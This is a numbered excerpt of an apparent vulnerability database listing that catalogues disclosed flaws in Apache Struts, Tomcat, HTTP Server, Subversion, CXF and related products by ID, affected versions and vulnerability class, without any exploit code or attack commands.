5102| [68357] Apache Struts up to 2.3.16.3 Random Number Generator cross site request forgery
5103| [73106] Apache Hadoop up to 2.4.0 Symlink privilege escalation
5104| [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation
5105| [72890] Apache Qpid 0.30 unknown vulnerability
5106| [72887] Apache Hive 0.13.0 File Permission privilege escalation
5107| [72878] Apache Cordova 3.5.0 cross site request forgery
5108| [72877] Apache Cordova 3.5.0 cross site request forgery
5109| [72876] Apache Cordova 3.5.0 cross site request forgery
5110| [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers denial of service
5111| [68065] Apache CXF up to 3.0.1 JAX-RS SAML denial of service
5112| [68064] Apache CXF up to 3.0.0 SAML Token denial of service
5113| [67913] Oracle Retail Markdown Optimization 12.0/13.0/13.1/13.2/13.4 Apache commons-beanutils-1.8.0.jar memory corruption
5114| [67912] Oracle Retail Invoice Matching up to 14.0 Apache commons-beanutils-1.8.0.jar memory corruption
5115| [67911] Oracle Retail Clearance Optimization Engine 13.3/13.4/14.0 Apache commons-beanutils-1.8.0.jar memory corruption
5116| [67910] Oracle Retail Allocation up to 13.2 Apache commons-beanutils-1.8.0.jar memory corruption
5117| [71835] Apache Shiro 1.0.0/1.1.0/1.2.0/1.2.1/1.2.2 unknown vulnerability
5118| [71633] Apachefriends XAMPP 1.8.1 cross site scripting
5119| [71629] Apache Axis2/C spoofing
5120| [67633] Apple Mac OS X up to 10.9.4 apache_mod_php ext/standard/dns.c dns_get_record memory corruption
5121| [67631] Apple Mac OS X up to 10.9.4 apache_mod_php Symlink memory corruption
5122| [67630] Apple Mac OS X up to 10.9.4 apache_mod_php cdf_read_property_info denial of service
5123| [67629] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_count_chain denial of service
5124| [67628] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_check_stream_offset denial of service
5125| [67627] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c mconvert memory corruption
5126| [67626] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c denial of service
5127| [67625] Apple Mac OS X up to 10.9.4 apache_mod_php Crash denial of service
5128| [67624] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_property_info denial of service
5129| [67623] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_unpack_summary_info denial of service
5130| [67622] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_short_sector denial of service
5131| [67620] Apple Mac OS X up to 10.9.4 apache_mod_php magic/Magdir/commands denial of service
5132| [67790] Apache HTTP Server mod_cache NULL Pointer Dereference denial of service
5133| [67522] Apache Tomcat up to 7.0.39 JSP Upload privilege escalation
5134| [70809] Apache POI up to 3.11 Crash denial of service
5135| [70808] Apache POI up to 3.10 unknown vulnerability
5136| [70806] Apache Commons-httpclient 4.2/4.2.1/4.2.2 spoofing
5137| [70749] Apache Axis up to 1.4 getCN spoofing
5138| [70701] Apache Traffic Server up to 3.3.5 denial of service
5139| [70700] Apache OFBiz up to 12.04.03 cross site scripting
5140| [67402] Apache OpenOffice 4.0.0/4.0.1/4.1.0 Calc privilege escalation
5141| [67401] Apache OpenOffice up to 4.1.0 OLE Object information disclosure
5142| [70661] Apache Subversion up to 1.6.17 denial of service
5143| [70660] Apache Subversion up to 1.6.17 spoofing
5144| [70659] Apache Subversion up to 1.6.17 spoofing
5145| [67183] Apache HTTP Server up to 2.4.9 mod_proxy denial of service
5146| [67180] Apache HTTP Server up to 2.4.9 WinNT MPM Memory Leak denial of service
5147| [67185] Apache HTTP Server up to 2.4.9 mod_status Heap-Based memory corruption
5148| [67184] Apache HTTP Server 2.4.5/2.4.6 mod_cache NULL Pointer Dereference denial of service
5149| [67182] Apache HTTP Server up to 2.4.9 mod_deflate Memory Consumption denial of service
5150| [67181] Apache HTTP Server up to 2.4.9 mod_cgid denial of service
5151| [70338] Apache Syncope up to 1.1.7 unknown vulnerability
5152| [70295] Apache CXF up to 2.7.9 Cleartext information disclosure
5153| [70106] Apache Open For Business Project up to 10.04.0 getServerError cross site scripting
5154| [70105] Apache MyFaces up to 2.1.5 JavaServer Faces directory traversal
5155| [69846] Apache HBase up to 0.94.8 information disclosure
5156| [69783] Apache CouchDB up to 1.2.0 memory corruption
5157| [13383] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 XML Parser privilege escalation
5158| [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid() privilege escalation
5159| [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi Content-Type Header information disclosure
5160| [13164] Apache CXF up to 2.6.13/2.7.10 SOAP OutgoingChainInterceptor.java Invalid Content denial of service
5161| [13163] Apache CXF up to 2.6.13/2.7.10 SOAP HTML Content denial of service
5162| [13158] Apache Struts up to 2.3.16.2 ParametersInterceptor getClass privilege escalation
5163| [69515] Apache Struts up to 2.3.15.0 CookieInterceptor memory corruption
5164| [13086] Apache Struts up to 1.3.10 Class Loader privilege escalation
5165| [13067] Apache Struts up to 2.3.16.1 Class Loader privilege escalation
5166| [69431] Apache Archiva up to 1.3.6 cross site scripting
5167| [69385] Apache Syncope up to 1.1.6 unknown vulnerability
5168| [69338] Apache Xalan-Java up to 2.7.1 system-property unknown vulnerability
5169| [12742] Trustwave ModSecurity up to 2.7.5 Chunk Extension apache2/modsecurity.c modsecurity_tx_init() privilege escalation
5170| [12741] Trustwave ModSecurity up to 2.7.6 Chunked HTTP Transfer apache2/modsecurity.c modsecurity_tx_init Trailing Header privilege escalation
5171| [13387] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Content-Length Header privilege escalation
5172| [13386] Apache Tomcat Security Manager up to 6.0.39/7.0.53/8.0.5 XSLT privilege escalation
5173| [13385] Apache Tomcat 8.0.0/8.0.1/8.0.3 AJP Request Zero Length denial of service
5174| [13384] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Chunked HTTP Request denial of service
5175| [12748] Apache CouchDB 1.5.0 UUIDS /_uuids denial of service
5176| [66739] Apache Camel up to 2.12.2 unknown vulnerability
5177| [66738] Apache Camel up to 2.12.2 unknown vulnerability
5178| [12667] Apache HTTP Server 2.4.7 mod_log_config.c log_cookie denial of service
5179| [66695] Apache CouchDB up to 1.2.0 cross site scripting
5180| [66694] Apache CouchDB up to 1.2.0 Partition partition2 directory traversal
5181| [66689] Apache HTTP Server up to 2.0.33 mod_dav dav_xml_get_cdata denial of service
5182| [12518] Apache Tomcat up to 6.0.38/7.0.49/8.0.0-RC9 HTTP Header denial of service
5183| [66498] Apache expressions up to 3.3.0 Whitelist unknown vulnerability
5184| [12781] Apache Struts up to 2.3.8 ParametersInterceptor getClass denial of service
5185| [12439] Apache Tomcat 6.0.33 XML XXE information disclosure
5186| [12438] Apache Tomcat 6.0.33/6.0.34/6.0.35/6.0.36/6.0.37 coyoteadapter.java disableURLRewriting privilege escalation
5187| [66356] Apache Wicket up to 6.8.0 information disclosure
5188| [12209] Apache Tomcat 8.0.0-RC1/8.0.1/7.0.0/7.0.50 Content-Type Header for Multi-Part Request Infinite Loop denial of service
5189| [66322] Apache ActiveMQ up to 5.8.0 cross site scripting
5190| [12291] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
5191| [66255] Apache Open For Business Project up to 10.04.3 cross site scripting
5192| [66200] Apache Hadoop up to 2.0.5 Security Feature information disclosure
5193| [66072] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
5194| [66068] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
5195| [11928] Oracle Secure Global Desktop up to 4.71 Apache Tomcat unknown vulnerability
5196| [11924] Oracle Secure Global Desktop up to 4.63 Apache Tomcat denial of service
5197| [11922] Oracle Secure Global Desktop up to 4.63 Apache Tomcat unknown vulnerability
5198| [66049] Apache XML Security for Java up to 1.4.6 Memory Consumption denial of service
5199| [12199] Apache Subversion up to 1.8.5 mod_dav_svn/repos.c get_resource denial of service
5200| [65946] askapache Firefox Adsense up to 3.0 askapache-firefox-adsense.php cross site request forgery
5201| [65668] Apache Solr 4.0.0 Updater denial of service
5202| [65665] Apache Solr up to 4.3.0 denial of service
5203| [65664] Apache Solr 3.6.0/3.6.1/3.6.2/4.0.0 Updater denial of service
5204| [65663] Apache Solr up to 4.5.1 ResourceLoader directory traversal
5205| [65658] Apache roller 4.0/4.0.1/5.0/5.0.1 unknown vulnerability
5206| [65657] Apache Roller 4.0/4.0.1/5.0/5.0.1 cross site scripting
5207| [11325] Apache Subversion 1.7.13 mod_dontdothat Bypass denial of service
5208| [11324] Apache Subversion up to 1.8.4 mod_dav_svn denial of service
5209| [11098] Apache Tomcat 5.5.25 HTTP Request cross site request forgery
5210| [65410] Apache Struts 2.3.15.3 cross site scripting
5211| [65386] Apache Solr up to 2.2.1 on TYPO3 cross site scripting
5212| [65385] Apache Solr up to 2.2.1 on TYPO3 unknown vulnerability
5213| [11044] Apache Struts 2.3.15.3 showConfig.action cross site scripting
5214| [11043] Apache Struts 2.3.15.3 actionNames.action cross site scripting
5215| [11018] cPanel WHM up to 11.40.0.11 Apache mod_userdir Tweak Interface privilege escalation
5216| [65342] Apache Sling 1.0.2/1.0.4/1.0.6/1.1.0/1.1.2 Auth Core cross site scripting
5217| [65340] Apache Shindig 2.5.0 information disclosure
5218| [65316] Apache Mod Fcgid up to 2.3.7 mod_fcgid fcgid_bucket.c fcgid_header_bucket_read memory corruption
5219| [65313] Apache Sling 2.2.0/2.3.0 AbstractCreateOperation.java deepGetOrCreateNode denial of service
5220| [10826] Apache Struts 2 File privilege escalation
5221| [65204] Apache Camel up to 2.10.1 unknown vulnerability
5222| [10460] Apache Struts 2.0.0/2.3.15.1 Action Mapping Mechanism Bypass privilege escalation
5223| [10459] Apache Struts 2.0.0/2.3.15 Dynamic Method Invocation unknown vulnerability
5224| [10160] Apache Subversion 1.8.0/1.8.1/1.8.2 svnwcsub.py handle_options race condition
5225| [10159] Apache Subversion up to 1.8.2 svnserve write_pid_file() race condition
5226| [10158] Apache Subversion 1.8.0/1.8.1/1.8.2 daemonize.py daemon::daemonize race condition
5227| [10157] Apache Subversion up to 1.8.1 FSFS Repository Symlink privilege escalation
5228| [64808] Fail2ban up to 0.8.9 apache-auth.conf denial of service
5229| [64760] Best Practical RT up to 4.0.12 Apache::Session::File information disclosure
5230| [64722] Apache XML Security for C++ Heap-based memory corruption
5231| [64719] Apache XML Security for C++ Heap-based memory corruption
5232| [64718] Apache XML Security for C++ verify denial of service
5233| [64717] Apache XML Security for C++ getURIBaseTXFM memory corruption
5234| [64716] Apache XML Security for C++ spoofing
5235| [64701] Apache CXF up to 2.7.3 XML Parser Memory Consumption denial of service
5236| [64700] Apache CloudStack up to 4.1.0 Stack-Based cross site scripting
5237| [64667] Apache Open For Business Project up to 10.04.04 unknown vulnerability
5238| [64666] Apache Open For Business Project up to 10.04.04 cross site scripting
5239| [9891] Apache HTTP Server 2.2.22 suEXEC Feature .htaccess information disclosure
5240| [64509] Apache ActiveMQ up to 5.8.0 scheduled.jsp cross site scripting
5241| [9826] Apache Subversion up to 1.8.0 mod_dav_svn denial of service
5242| [9683] Apache HTTP Server 2.4.5 mod_session_dbd denial of service
5243| [64485] Apache Struts up to 2.2.3.0 privilege escalation
5244| [9568] Apache Struts up to 2.3.15 DefaultActionMapper cross site request forgery
5245| [9567] Apache Struts up to 2.3.15 DefaultActionMapper memory corruption
5246| [64467] Apache Geronimo 3.0 memory corruption
5247| [64466] Apache OpenJPA up to 2.2.1 Serialization memory corruption
5248| [64457] Apache Struts up to 2.2.3.0 cross site scripting
5249| [64326] Alejandro Garza Apachesolr Autocomplete up to 7.x-1.1 cross site scripting
5250| [9184] Apache Qpid up to 0.20 SSL misconfiguration
5251| [8935] Apache Subversion up to 1.7.9 FSFS Format Repository denial of service
5252| [8934] Apache Subversion up to 1.7.9 Svnserve Server denial of service
5253| [8933] Apache Subversion up to 1.6.21 check-mime-type.pl svnlook memory corruption
5254| [8932] Apache Subversion up to 1.6.21 svn-keyword-check.pl svnlook changed memory corruption
5255| [9022] Apache Struts up to 2.3.14.2 OGNL Expression memory corruption
5256| [8873] Apache Struts 2.3.14 privilege escalation
5257| [8872] Apache Struts 2.3.14 privilege escalation
5258| [8746] Apache HTTP Server Log File Terminal Escape Sequence Filtering mod_rewrite.c do_rewritelog privilege escalation
5259| [8666] Apache Tomcat up to 7.0.32 AsyncListener information disclosure
5260| [8665] Apache Tomcat up to 7.0.29 Chunked Transfer Encoding Extension Size denial of service
5261| [8664] Apache Tomcat up to 7.0.32 FORM Authentication weak authentication
5262| [64075] Apache Subversion up to 1.7.7 mod_dav_svn Crash denial of service
5263| [64074] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
5264| [64073] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
5265| [64072] Apache Subversion up to 1.7.7 mod_dav_svn NULL Pointer Dereference denial of service
5266| [64071] Apache Subversion up to 1.7.8 mod_dav_svn Memory Consumption denial of service
5267| [8768] Apache Struts up to 2.3.14 on Mac EL and OGNL Interpreter memory corruption
5268| [64006] Apache ActiveMQ up to 5.7.0 denial of service
5269| [64005] Apache ActiveMQ up to 5.7.0 Default Configuration denial of service
5270| [64004] Apache ActiveMQ up to 5.7.0 PortfolioPublishServlet.java cross site scripting
5271| [8427] Apache Tomcat Session Transaction weak authentication
5272| [63960] Apache Maven 3.0.4 Default Configuration spoofing
5273| [63751] Apache qpid up to 0.20 qpid::framing::Buffer denial of service
5274| [63750] Apache qpid up to 0.20 checkAvailable denial of service
5275| [63749] Apache Qpid up to 0.20 Memory Consumption denial of service
5276| [63748] Apache Qpid up to 0.20 Default Configuration denial of service
5277| [63747] Apache Rave up to 0.20 User Account information disclosure
5278| [7889] Apache Subversion up to 1.6.17 mod_dav_svn/svn_fs_file_length() denial of service
5279| [63646] Apache HTTP Server up to 2.2.23/2.4.3 mod_proxy_balancer.c balancer_handler cross site scripting
5280| [7688] Apache CXF up to 2.7.1 WSS4JInterceptor Bypass weak authentication
5281| [7687] Apache CXF up to 2.7.2 Token weak authentication
5282| [63334] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
5283| [63299] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
5284| [7202] Apache HTTP Server 2.4.2 on Oracle Solaris ld_library_path cross site scripting
5285| [7075] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector NioEndpoint.java denial of service
5286| [7074] Apache Tomcat up to 6.0.35/7.0.29 FORM Authentication RealmBase.java weak authentication
5287| [7073] Apache Tomcat up to 6.0.35/7.0.31 CSRF Prevention Filter cross site request forgery
5288| [63090] Apache Tomcat up to 4.1.24 denial of service
5289| [63089] Apache HTTP Server up to 2.2.13 mod_proxy_ajp denial of service
5290| [62933] Apache Tomcat up to 5.5.0 Access Restriction unknown vulnerability
5291| [62929] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector Memory Consumption denial of service
5292| [62833] Apache CXF -/2.6.0 spoofing
5293| [62832] Apache Axis2 up to 1.6.2 spoofing
5294| [62831] Apache Axis up to 1.4 Java Message Service spoofing
5295| [62830] Apache Commons-httpclient 3.0 Payments spoofing
5296| [62826] Apache Libcloud up to 0.11.0 spoofing
5297| [62757] Apache Open For Business Project up to 10.04.0 unknown vulnerability
5298| [8830] Red Hat JBoss Enterprise Application Platform 6.0.1 org.apache.catalina.connector.Response.encodeURL information disclosure
5299| [62661] Apache Axis2 unknown vulnerability
5300| [62658] Apache Axis2 unknown vulnerability
5301| [62467] Apache Qpid up to 0.17 denial of service
5302| [62417] Apache CXF 2.4.7/2.4.8/2.5.3/2.5.4/2.6.1 spoofing
5303| [6301] Apache HTTP Server mod_pagespeed cross site scripting
5304| [6300] Apache HTTP Server mod_pagespeed Hostname information disclosure
5305| [6123] Apache Wicket up to 1.5.7 Ajax Link cross site scripting
5306| [62035] Apache Struts up to 2.3.4 denial of service
5307| [61916] Apache QPID 0.14/0.16/0.5/0.6 unknown vulnerability
5308| [6998] Apache Tomcat 5.5.35/6.0.35/7.0.28 DIGEST Authentication Session State Caching privilege escalation
5309| [6997] Apache Tomcat 5.5.35/6.0.35/7.0.28 HTTP Digest Authentication Implementation privilege escalation
5310| [6092] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_ajp.c information disclosure
5311| [6090] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_http.c information disclosure
5312| [61507] Apache POI up to 3.8 UnhandledDataStructure denial of service
5313| [6070] Apache Struts up to 2.3.4 Token Name Configuration Parameter privilege escalation
5314| [6069] Apache Struts up to 2.3.4 Request Parameter OGNL Expression denial of service
5315| [5764] Oracle Solaris 10 Apache HTTP Server information disclosure
5316| [5700] Oracle Secure Backup 10.3.0.3/10.4.0.1 Apache denial of service
5317| [61255] Apache Hadoop 2.0.0 Kerberos unknown vulnerability
5318| [61229] Apache Sling up to 2.1.1 denial of service
5319| [61152] Apache Commons-compress 1.0/1.1/1.2/1.3/1.4 denial of service
5320| [61094] Apache Roller up to 5.0 cross site scripting
5321| [61093] Apache Roller up to 5.0 cross site request forgery
5322| [61005] Apache OpenOffice 3.3/3.4 unknown vulnerability
5323| [9673] Apache HTTP Server up to 2.4.4 mod_dav mod_dav.c Request denial of service
5324| [5436] Apache OpenOffice 3.3/3.4 WPXContentListener.cpp _closeTableRow() File memory corruption
5325| [5435] Apache OpenOffice 3.3/3.4 vclmi.dll File memory corruption
5326| [60730] PHP 5.4.0/5.4.1/5.4.2 apache_request_headers memory corruption
5327| [60708] Apache Qpid 0.12 unknown vulnerability
5328| [5032] Apache Hadoop up to 0.20.205.0/1.0.1/0.23.1 Kerberos/MapReduce Security Feature privilege escalation
5329| [4949] Apache Struts File Upload XSLTResult.java XSLT File privilege escalation
5330| [4955] Apache Traffic Server 3.0.3/3.1.2 HTTP Header Parser memory corruption
5331| [4882] Apache Wicket up to 1.5.4 directory traversal
5332| [4881] Apache Wicket up to 1.4.19 cross site scripting
5333| [4884] Apache HTTP Server up to 2.3.6 mod_fcgid fcgid_spawn_ctl.c FcgidMaxProcessesPerClass HTTP Requests denial of service
5334| [60352] Apache Struts up to 2.2.3 memory corruption
5335| [60153] Apache Portable Runtime up to 1.4.3 denial of service
5336| [4598] Apache Struts 1.3.10 upload-submit.do cross site scripting
5337| [4597] Apache Struts 1.3.10 processSimple.do cross site scripting
5338| [4596] Apache Struts 2.0.14/2.2.3 struts2-rest-showcase/orders cross site scripting
5339| [4595] Apache Struts 2.0.14/2.2.3 struts2-showcase/person/editPerson.action cross site scripting
5340| [4583] Apache HTTP Server up to 2.2.21 Threaded MPM denial of service
5341| [4582] Apache HTTP Server up to 2.2.21 protocol.c information disclosure
5342| [4571] Apache Struts up to 2.3.1.2 privilege escalation
5343| [4557] Apache Tomcat up to 7.0.21 Caching/Recycling information disclosure
5344| [59934] Apache Tomcat up to 6.0.9 DigestAuthenticator.java unknown vulnerability
5345| [59933] Apache Tomcat up to 6.0.9 Access Restriction unknown vulnerability
5346| [59932] Apache Tomcat up to 6.0.9 unknown vulnerability
5347| [59931] Apache Tomcat up to 6.0.9 Access Restriction information disclosure
5348| [59902] Apache Struts up to 2.2.3 Interfaces unknown vulnerability
5349| [4528] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
5350| [4527] Apache Struts up to 2.2.3 ExceptionDelegator cross site scripting
5351| [59888] Apache Tomcat up to 6.0.6 denial of service
5352| [59886] Apache ActiveMQ up to 5.5.1 Crash denial of service
5353| [4513] Apache Struts up to 2.3.1 ParameterInterceptor directory traversal
5354| [4512] Apache Struts up to 2.2.3 CookieInterceptor command injection
5355| [59850] Apache Geronimo up to 2.2.1 denial of service
5356| [59825] Apache HTTP Server up to 2.1.7 mod_reqtimeout denial of service
5357| [59556] Apache HTTP Server up to 2.0.53 mod_proxy information disclosure
5358| [58467] Apache libcloud 0.2.0/0.3.0/0.3.1/0.4.0 Access Restriction spoofing
5359| [58413] Apache Tomcat up to 6.0.10 spoofing
5360| [58381] Apache Wicket up to 1.4.17 cross site scripting
5361| [58296] Apache Tomcat up to 7.0.19 unknown vulnerability
5362| [57888] Apache HttpClient 4.0/4.0.1/4.1 Authorization information disclosure
5363| [57587] Apache Subversion up to 1.6.16 mod_dav_svn information disclosure
5364| [57585] Apache Subversion up to 1.6.16 mod_dav_svn Memory Consumption denial of service
5365| [57584] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
5366| [57577] Apache Rampart-C 1.3.0 Access Restriction rampart_timestamp_token_validate privilege escalation
5367| [57568] Apache Archiva up to 1.3.4 cross site scripting
5368| [57567] Apache Archiva up to 1.3.4 cross site request forgery
5369| [57481] Apache Tomcat 7.0.12/7.0.13 Access Restriction unknown vulnerability
5370| [4355] Apache HTTP Server APR apr_fnmatch denial of service
5371| [57435] Apache Struts up to 2.2.1.1 FileHandler.java cross site scripting
5372| [57425] Apache Struts up to 2.2.1.1 cross site scripting
5373| [4352] Apache HTTP Server 2.2.x APR apr_fnmatch denial of service
5374| [57025] Apache Tomcat up to 7.0.11 information disclosure
5375| [57024] Apache Tomcat 7.0.11 Access Restriction information disclosure
5376| [56774] IBM WebSphere Application Server up to 7.0.0.14 org.apache.jasper.runtime.JspWriterImpl.response denial of service
5377| [56824] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
5378| [56832] Apache Tomcat up to 7.0.10 Access Restriction information disclosure
5379| [56830] Apache Tomcat up to 7.0.9 Access Restriction privilege escalation
5380| [12440] Apache Tomcat 6.0.33 Malicious Request cross site scripting
5381| [56512] Apache Continuum up to 1.4.0 cross site scripting
5382| [4285] Apache Tomcat 5.x JVM getLocale() denial of service
5383| [4284] Apache Tomcat 5.x HTML Manager cross site scripting
5384| [4283] Apache Tomcat 5.x ServletContect privilege escalation
5385| [56441] Apache Tomcat up to 7.0.6 denial of service
5386| [56300] Apache CouchDB up to 1.0.1 Web Administration Interface cross site scripting
5387| [55967] Apache Subversion up to 1.6.4 rev_hunt.c denial of service
5388| [55966] Apache Subversion up to 1.6.4 mod_dav_svn repos.c walk denial of service
5389| [55095] Apache Axis2 up to 1.6 Default Password memory corruption
5390| [55631] Apache Archiva up to 1.3.1 User Account cross site request forgery
5391| [55556] Apache Tomcat up to 6.0.29 Default Configuration information disclosure
5392| [55553] Apache Tomcat up to 7.0.4 sessionsList.jsp cross site scripting
5393| [55162] Apache MyFaces up to 2.0.0 Authentication Code unknown vulnerability
5394| [54881] Apache Subversion up to 1.6.12 mod_dav_svn authz.c privilege escalation
5395| [54879] Apache APR-util up to 0.9.14 mod_reqtimeout apr_brigade_split_line denial of service
5396| [54693] Apache Traffic Server DNS Cache unknown vulnerability
5397| [54416] Apache CouchDB up to 0.11.0 cross site request forgery
5398| [54394] Apache CXF up to 2.2.8 Memory Consumption denial of service
5399| [54261] Apache Tomcat jsp/cal/cal2.jsp cross site scripting
5400| [54166] Apache HTTP Server up to 2.2.12 mod_cache Crash denial of service
5401| [54385] Apache Struts up to 2.1.8.1 ParameterInterceptor unknown vulnerability
5402| [54012] Apache Tomcat up to 6.0.10 denial of service
5403| [53763] Apache Axis2 1.3/1.4/1.4.1/1.5/1.5.1 Memory Consumption denial of service
5404| [53368] Apache MyFaces 1.1.7/1.2.8 cross site scripting
5405| [53397] Apache axis2 1.4.1/1.5.1 Administration Console cross site scripting
5406| [52894] Apache Tomcat up to 6.0.7 information disclosure
5407| [52960] Apache ActiveMQ up to 5.4-snapshot information disclosure
5408| [52843] Apache HTTP Server mod_auth_shadow unknown vulnerability
5409| [52786] Apache Open For Business Project up to 09.04 cross site scripting
5410| [52587] Apache ActiveMQ up to 5.3.0 cross site request forgery
5411| [52586] Apache ActiveMQ up to 5.3.0 cross site scripting
5412| [52584] Apache CouchDB up to 0.10.1 information disclosure
5413| [51757] Apache HTTP Server 2.0.44 cross site scripting
5414| [51756] Apache HTTP Server 2.0.44 spoofing
5415| [51717] Apache HTTP Server up to 1.3.3 mod_proxy ap_proxy_send_fb memory corruption
5416| [51690] Apache Tomcat up to 6.0 directory traversal
5417| [51689] Apache Tomcat up to 6.0 information disclosure
5418| [51688] Apache Tomcat up to 6.0 directory traversal
5419| [50886] HP Operations Manager 8.10 on Windows File Upload org.apache.catalina.manager.HTMLManagerServlet memory corruption
5420| [50802] Apache Tomcat up to 3.3 Default Password weak authentication
5421| [50626] Apache Solr 1.0.0 cross site scripting
5422| [49857] Apache HTTP Server mod_proxy_ftp cross site scripting
5423| [49856] Apache HTTP Server 2.2.13 mod_proxy_ftp ap_proxy_ftp_handler denial of service
5424| [49348] Apache Xerces-C++ 2.7.0 Stack-Based denial of service
5425| [86789] Apache Portable Runtime memory/unix/apr_pools.c unknown vulnerability
5426| [49283] Apache APR-util up to 1.3.8 apr-util misc/apr_rmm.c apr_rmm_realloc memory corruption
5427| [48952] Apache HTTP Server up to 1.3.6 mod_deflate denial of service
5428| [48626] Apache Tomcat up to 4.1.23 Access Restriction directory traversal
5429| [48431] Apache Tomcat up to 4.1.23 j_security_check cross site scripting
5430| [48430] Apache Tomcat up to 4.1.23 mod_jk denial of service
5431| [47801] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site request forgery
5432| [47800] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site scripting
5433| [47799] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console directory traversal
5434| [47648] Apache Tiles 2.1.0/2.1.1 cross site scripting
5435| [47640] Apache Struts 2.0.11/2.0.6/2.0.8/2.0.9/2.1 cross site scripting
5436| [47638] Apache Tomcat up to 4.1.23 mod_jk information disclosure
5437| [47636] Apache Struts 2.0.9 xip_client.html cross site scripting
5438| [47593] Apache Mod Perl 1 perl-status Apache::Status cross site scripting
5439| [47637] Apache Struts 1.0.2/1.1/1.2.4/1.2.7/1.2.8 cross site scripting
5440| [47239] Apache Struts up to 2.1.2 Beta struts directory traversal
5441| [47214] Apachefriends xampp 1.6.8 spoofing
5442| [47213] Apachefriends xampp 1.6.8 htaccess cross site request forgery
5443| [47162] Apachefriends XAMPP 1.4.4 weak authentication
5444| [47065] Apache Tomcat 4.1.23 cross site scripting
5445| [46834] Apache Tomcat up to 5.5.20 cross site scripting
5446| [46004] Apache Jackrabbit 1.4/1.5.0 search.jsp cross site scripting
5447| [49205] Apache Roller 2.3/3.0/3.1/4.0 Search cross site scripting
5448| [86625] Apache Struts directory traversal
5449| [44461] Apache Tomcat up to 5.5.0 information disclosure
5450| [44389] Apache Xerces-C++ XML Parser Memory Consumption denial of service
5451| [44352] Apache Friends XAMPP 1.6.8 adodb.php cross site scripting
5452| [43663] Apache Tomcat up to 6.0.16 directory traversal
5453| [43612] Apache Friends XAMPP 1.6.7 iart.php cross site scripting
5454| [43556] Apache HTTP Server up to 2.1.8 mod_proxy_ftp proxy_ftp.c cross site scripting
5455| [43516] Apache Tomcat up to 4.1.20 directory traversal
5456| [43509] Apache Tomcat up to 6.0.13 cross site scripting
5457| [42637] Apache Tomcat up to 6.0.16 cross site scripting
5458| [42325] Apache HTTP Server up to 2.1.8 Error Page cross site scripting
5459| [41838] Apache-SSL 1.3.34 1.57 expandcert privilege escalation
5460| [41091] Apache Software Foundation Mod Jk up to 2.0.1 mod_jk2 Stack-based memory corruption
5461| [40924] Apache Tomcat up to 6.0.15 information disclosure
5462| [40923] Apache Tomcat up to 6.0.15 unknown vulnerability
5463| [40922] Apache Tomcat up to 6.0 information disclosure
5464| [40710] Apache HTTP Server up to 2.0.61 mod_negotiation cross site scripting
5465| [40709] Apache HTTP Server up to 2.0.53 mod_negotiation cross site scripting
5466| [40656] Apache Tomcat 5.5.20 information disclosure
5467| [40503] Apache HTTP Server mod_proxy_ftp cross site scripting
5468| [40502] Apache HTTP Server up to 2.2.5 mod_proxy_balancer memory corruption
5469| [40501] Apache HTTP Server 2.2.6 mod_proxy_balancer cross site request forgery
5470| [40398] Apache HTTP Server up to 2.2 mod_proxy_balancer cross site scripting
5471| [40397] Apache HTTP Server up to 2.2 mod_proxy_balancer balancer_handler denial of service
5472| [40234] Apache Tomcat up to 6.0.15 directory traversal
5473| [40221] Apache HTTP Server 2.2.6 information disclosure
5474| [40027] David Castro Apache Authcas 0.4 sql injection
5475| [3495] Apache OpenOffice up to 2.3 Database Document Processor Designfehler
5476| [3489] Apache HTTP Server 2.x HTTP Header cross site scripting
5477| [3414] Apache Tomcat WebDAV Stored Umgehungs-Angriff
5478| [39489] Apache Jakarta Slide up to 2.1 directory traversal
5479| [39540] Apache Geronimo 2.0/2.0.1/2.0.2/2.1 unknown vulnerability
5480| [3310] Apache OpenOffice 1.1.3/2.0.4/2.2.1 TIFF Image Parser Heap-based memory corruption
5481| [38768] Apache HTTP Server up to 2.1.7 mod_autoindex.c cross site scripting
5482| [38952] Apache Geronimo 2.0.1/2.1 unknown vulnerability
5483| [38658] Apache Tomcat 4.1.31 cal2.jsp cross site request forgery
5484| [38524] Apache Geronimo 2.0 unknown vulnerability
5485| [3256] Apache Tomcat up to 6.0.13 cross site scripting
5486| [38331] Apache Tomcat 4.1.24 information disclosure
5487| [38330] Apache Tomcat 4.1.24 information disclosure
5488| [38185] Apache Tomcat 3.3/3.3.1/3.3.1a/3.3.2 Error Message CookieExample cross site scripting
5489| [37967] Apache Tomcat up to 4.1.36 Error Message sendmail.jsp cross site scripting
5490| [37647] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 Authorization unknown vulnerability
5491| [37646] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 unknown vulnerability
5492| [3141] Apache Tomcat up to 4.1.31 Accept-Language Header cross site scripting
